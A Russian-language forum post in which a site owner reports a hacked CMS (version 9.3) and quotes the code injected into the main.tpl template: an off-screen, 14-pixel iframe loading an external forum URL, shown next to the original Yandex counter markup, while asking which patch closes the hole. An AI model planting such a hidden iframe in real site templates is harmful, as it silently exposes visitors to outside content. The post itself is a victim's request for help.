Перейти к публикации

_spawn_

Клиенты
  • Публикации

    4
  • Зарегистрирован

  • Посещение

Сообщения, опубликованные пользователем _spawn_

  1. Вчера обнаружил взлом сайта (чужой код обнаружен через сутки после взлома), все обновления и патчи вроде ставились.

    Версия движка - 9.3.

    В main.tpl появилась вот такая вставка:  

     

    <noscript><div><img src="//mc.yandex.ru/watch/7348000" style="position:absolute; left:-9999px;" alt="" /></div></noscript><iframe src="http://forum.academy.com.ua/styles/subsilver2/theme/images/" width=14 height=14 style="position:absolute; left:-9999px;"></iframe>


    До взлома было вот так:

    <noscript><div><img src="//mc.yandex.ru/watch/7348000" style="position:absolute; left:-9999px;" alt="" /></div></noscript>

     

    Уважаемые админы подскажите, как произошел данный взлом, какой патч нужно использовать, чтобы закрыть уязвимость.

    Старался ставить все патчи, возможно какой-то не установлен или это новый вид уязвимости?
     

×
×
  • Создать...